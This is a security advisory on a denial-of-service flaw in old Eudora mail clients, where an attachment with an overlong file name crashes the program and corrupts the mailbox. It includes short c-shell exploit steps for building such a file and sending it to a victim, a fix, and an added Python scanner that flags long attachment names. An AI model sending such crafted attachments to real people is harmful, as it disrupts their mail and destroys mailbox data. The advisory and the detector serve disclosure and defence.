Eudora, developed and distributed by Qualcomm, is a Mail User Agent running on Windows 95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
A remote user can cause a denial of service (DoS) by sending an attachment with an exceptionally long file name. This does not cause an exploitable buffer overflow, but it crashes the program.
In addition, the mailbox is corrupted, which causes the program to crash every time.
Note that this is a different issue from the one discussed here: Windows buffer overflow vulnerability
Credit:
Information was provided by David Fernandez Madrid
Vulnerable versions:
* Eudora Versions 5.1.* and lower
Immune versions:
* Eudora Version 5.2 and higher
Exploit Code:
Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo "security" >! $a.txt
(Written in c-shell)
Then send the file two or three times as an attachment to the victim.
Solution:
Download the latest version of Eudora at: Eudora Update
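
Where clients cannot be upgraded immediately, a mail gateway or mailbox scanner can flag such messages before a vulnerable client opens them. The following is an added example, not part of the original advisory or of Eudora: it walks a message's MIME parts and reports attachment names longer than a limit, including names split across RFC 2231 continuations. The 128-character limit and the names MAX_NAME_LEN, long_attachment_names and build_sample are assumptions; the advisory gives no exact length.

```python
from email import message_from_bytes
from email.utils import collapse_rfc2231_value

MAX_NAME_LEN = 128  # assumed policy limit; the advisory states no exact length

# (header, parameter) pairs that can carry an attachment name
NAME_SOURCES = (("content-disposition", "filename"), ("content-type", "name"))


def long_attachment_names(raw, limit=MAX_NAME_LEN):
    """Return [(part_index, header, name_length)] for names longer than limit."""
    msg = message_from_bytes(raw)
    hits = []
    for index, part in enumerate(msg.walk()):
        if part.is_multipart():
            continue
        for header, param in NAME_SOURCES:
            value = part.get_param(param, header=header)
            if value is None:
                continue
            # get_param() has already joined RFC 2231 continuations
            # (filename*0, filename*1, ...); collapse the charset tuple form.
            name = collapse_rfc2231_value(value).strip()
            if len(name) > limit:
                hits.append((index, header, len(name)))
    return hits


def build_sample():
    """Constructed test message: one short name, one long name split in two."""
    half = "A" * 100
    return (
        "From: sender@example.org\r\n"
        "To: user@example.org\r\n"
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/mixed; boundary="b"\r\n\r\n'
        '--b\r\nContent-Type: text/plain\r\n'
        'Content-Disposition: attachment; filename="notes.txt"\r\n\r\nok\r\n'
        '--b\r\nContent-Type: text/plain\r\n'
        'Content-Disposition: attachment;\r\n'
        f' filename*0="{half}";\r\n filename*1="{half}.txt"\r\n\r\nsecurity\r\n'
        "--b--\r\n"
    ).encode("ascii")


if __name__ == "__main__":
    for index, header, length in long_attachment_names(build_sample()):
        print(f"part {index}: {header} name is {length} characters")
```

Checking both headers matters because a client may take the name from either Content-Disposition or Content-Type.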